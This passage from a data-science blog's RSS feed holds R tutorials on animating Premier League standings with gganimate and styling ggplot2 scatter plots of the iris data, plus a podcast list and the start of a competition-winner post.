&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(GD, Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_label&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Team, fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Status), label.padding &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unit&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;lines&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;PL Team Points vs Goal Difference 17/18&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Date: {frame_time}&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_brewer&lt;/span&gt;(type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;qual&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Paired&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;transition_time&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;animate&lt;/span&gt;(g, nframes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;200&lt;/span&gt;, fps &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="Premier_league_animation.gif" style="width:500px; class:image-center"&gt;
&lt;p&gt;We&amp;rsquo;ve only added one function here. Easy! If you are wanting to split it up by something more arbitrary (a character variable let&amp;rsquo;s say), then you would use &lt;code&gt;transition_states()&lt;/code&gt;. Then all that is needed is the animate function! Within the &lt;code&gt;animate()&lt;/code&gt; function, the &lt;code&gt;nframes&lt;/code&gt; argument is the total number of frames whilst the &lt;code&gt;fps&lt;/code&gt; argument is the total number of frames &lt;em&gt;per second&lt;/em&gt;. If we wanted our gif to be a bit quicker, we&amp;rsquo;d go for a higher frame per second.&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s all for now, thanks for reading!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-gganimate-premier-league/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Podcast recommendations</title><link>https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/</link><pubDate>Wed, 29 Aug 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Anyone who has a long commute or who has to travel with work knows the importance of podcasts. Podcasts allow you turn otherwise useless time, into something both productive and interesting. In this blog post, we&amp;rsquo;ll describe some of our favourite podcasts.&lt;/p&gt;
&lt;p&gt;This list isn&amp;rsquo;t meant to be exhaustive, it&amp;rsquo;s just what we are &lt;strong&gt;currently&lt;/strong&gt; listening too - our top 5. But don&amp;rsquo;t fret, we&amp;rsquo;ve created a &lt;a href="https://jumpingrivers.github.io/podcasts/" rel="external"&gt;comprehensive&lt;/a&gt; list, so let us know if any are missing.&lt;/p&gt;
&lt;h3 id="not-so-standard-deviations"&gt;Not so Standard Deviations&lt;/h3&gt;
&lt;p&gt;A &lt;a href="https://twitter.com/nssdeviations" rel="external"&gt;data science&lt;/a&gt; podcast by Roger Peng &lt;a href="https://twitter.com/rdpeng" rel="external"&gt;@rdpeng&lt;/a&gt; and Hilary Parker &lt;a href="https://twitter.com/hspter" rel="external"&gt;@hspter&lt;/a&gt; who talk about the latest in data science and data analysis in academia and industry. They talk a lot about R and common problems in the life of a data scientist. A nice mixture of technical and light topics.&lt;/p&gt;
&lt;h3 id="grumpy-old-geeks"&gt;Grumpy Old Geeks&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;What went wrong on the internet and who&amp;rsquo;s to blame&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="http://gog.show/" rel="external"&gt;Two &amp;ldquo;elder&amp;rdquo; geeks&lt;/a&gt;, complain about the internet and tech at large. Amusing, especially for their disdain for AI. Not really data science, but general tech. Warning: sometimes the language is &amp;ldquo;adult&amp;rdquo;.&lt;/p&gt;
&lt;h3 id="dataframed"&gt;Dataframed&lt;/h3&gt;
&lt;p&gt;The official &lt;a href="https://www.datacamp.com/community/podcast" rel="external"&gt;podcast&lt;/a&gt; from Data Camp. Each episode takes the form of an interview.&lt;/p&gt;
&lt;h3 id="more-or-less"&gt;More or Less&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.bbc.co.uk/programmes/b006qshd" rel="external"&gt;Tim Harford&lt;/a&gt; explains - and sometimes debunks - the numbers and statistics used in political debate, the news and everyday life. The programme has a UK slant but covers global topics. It&amp;rsquo;s very useful for playing in the car in the presence of non-data scientists!&lt;/p&gt;
&lt;h3 id="in-our-time"&gt;In our Time&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.bbc.co.uk/programmes/b006qykl/episodes/a-z/a" rel="external"&gt;In Our Time&lt;/a&gt; is a live BBC radio discussion series exploring the history of ideas, presented by Melvyn Bragg since 15 October 1998. It covers a variety of topics, including Mathematics. Each programme lasts one hour.&lt;/p&gt;
&lt;h4 id="credits"&gt;Credits&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Photo by Austin Distel on &lt;a href="https://unsplash.com/s/photos/podcast" rel="external"&gt;Unsplash&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/data-science-podcast-recommendations/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Styling {ggplot2} Graphics</title><link>https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/</link><pubDate>Tue, 21 Aug 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/featured.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="styling-ggplot2-graphics"&gt;Styling {ggplot2} graphics&lt;/h2&gt;
&lt;p&gt;In our &lt;a href="https://www.jumpingrivers.com/blog/styling-base-r-graphics/"&gt;previous post&lt;/a&gt;, we demonstrated that contrary to popular opinion, it is possible to generate attractive looking plots using just base graphics. Although we did confess, that it did take a lot of time and effort. In this post, we repeat the same exercise. Using the dreaded &lt;code&gt;iris&lt;/code&gt; data set, we’ll first create the default {ggplot2} graph, before applying a bit of care and attention.&lt;/p&gt;
&lt;h2 id="the-standard-ggplot-version"&gt;The standard ggplot version&lt;/h2&gt;
&lt;p&gt;The standard scatter plot is straightforward to create. Load the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then create a scatter plot with the wonderful grey background&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ggplot2 even spells colour correctly ;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot1-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Unlike the base R offering, the list of possible improvements to this plot is pleasingly short. Basically, it’s&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the axis labels (but they come from &lt;strong&gt;our&lt;/strong&gt; column headings)&lt;/li&gt;
&lt;li&gt;colours (red &amp;amp; blue aren’t the best combination)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So overall, pretty good. Other aspects that could be improved are&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;grey background&lt;/li&gt;
&lt;li&gt;direct labels on the points&lt;/li&gt;
&lt;li&gt;starting the x-axis at 4, not 4.2&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-styling-ggplot2-r-graphics"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="styling-the-plot-using-only-ggplot2"&gt;Styling the plot using only {ggplot2}&lt;/h2&gt;
&lt;p&gt;Using only {ggplot2} (and a little bit of {dplyr} love), we can improve significantly and easily improve the graph. First, we’ll capitalise the legend key. I find it easier to manipulate the data directly,&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;dplyr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;iris &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(iris, Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_to_title&lt;/span&gt;(Species))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the data tweaked, we can get to the serious business of styling the plot. As the plot will contain a number of components it makes sense to create intermediate objects. As the points overlap, we&amp;rsquo;ll change from &lt;code&gt;geom_point()&lt;/code&gt;, to &lt;code&gt;geom_jitter()&lt;/code&gt;. This geom wiggles the points and allow us to see overlapping points:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_jitter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal length&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal width&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Improve axis labels&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous Iris plot&amp;#34;&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# Title&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot2-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;The changes we’ve made so far would impossible for any package to do for us - how would the package know the plot title? We can now improve the look and feel of the plot. There are two ways of complementary ways of doing this: scales and themes. The ggplot scales control things like colours and point size. In the latest version of {ggplot2}, version 3.0.0, the Viridis colour palette was introduced. This palette is particularly useful for creating colour-blind friendly palettes&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;() &lt;span style="color:#8b949e;font-style:italic"&gt;# d for discrete&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The theme controls elements such as grid lines, fonts, labels. I’m partial to &lt;code&gt;theme_minimal()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_viridis_d&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot3-1.svg" style="width:550px; class:image-center"&gt;
&lt;h2 id="the-hrbrthemes-package"&gt;The hrbrthemes package&lt;/h2&gt;
&lt;p&gt;We don’t just have to use the themes that come with {ggplot2}, we can use themes provided by other packages. The {hrbrthemes} package contains a nice theme called &lt;code&gt;ipsum&lt;/code&gt; that&amp;rsquo;s similar to the minimal theme, but also tweaks the font and sub-headings. There is also an associated colour scheme called scale_colour_ipsum()`. An additional improvement we&amp;rsquo;ll make, is to drop the legend and place the text directly on the chart. After loading the package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;hrbrthemes&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;we create a data frame with the label positions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;labels &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;5.3&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;), y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4.2&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;2.1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;3.7&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Species &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Setosa&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Versicolor&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Virginica&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We construct the plot as usual&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(iris, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Length, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Sepal.Width)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_jitter&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_ipsum&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;labs&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal length&amp;#34;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;Sepal width&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;The infamous Iris data set&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Thanks @hrbrmstr for the theme&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_ipsum&lt;/span&gt;(guide &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_text&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; labels, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x, y, label &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Species)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlim&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="plot4-1.svg" style="width:550px; class:image-center"&gt;
&lt;p&gt;Notice we can add data from two data sets onto a ggplot with relative ease.&lt;/p&gt;
&lt;p&gt;Thanks for reading, see you next time!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/styling-ggplot2-r-graphics/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why R 2018 Winners</title><link>https://www.jumpingrivers.com/blog/why-r-2018-winners/</link><pubDate>Mon, 02 Jul 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/why-r-2018-winners/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/why-r-2018-winners/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/why-r-2018-winners/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;So it’s here… After lots of entries (147 to be precise), we can finally announce the winner of the WhyR 2018 Competition! But first, we have to tell you quickly about how we picked the winner.&lt;/p&gt;
&lt;h2 id="how-we-did-it"&gt;How we did it&lt;/h2&gt;
&lt;p&gt;So it really wasn’t that hard. We held the questionnaire on &lt;a href="http://referral.typeform.com/mzcsnTI" rel="external"&gt;typeform&lt;/a&gt;. Conveniently, my colleague has created a package {rtypeform} which is an interface to the typeform API. You can install this from CRAN in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtypeform&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rtypeform&amp;#34;&lt;/span&gt;)
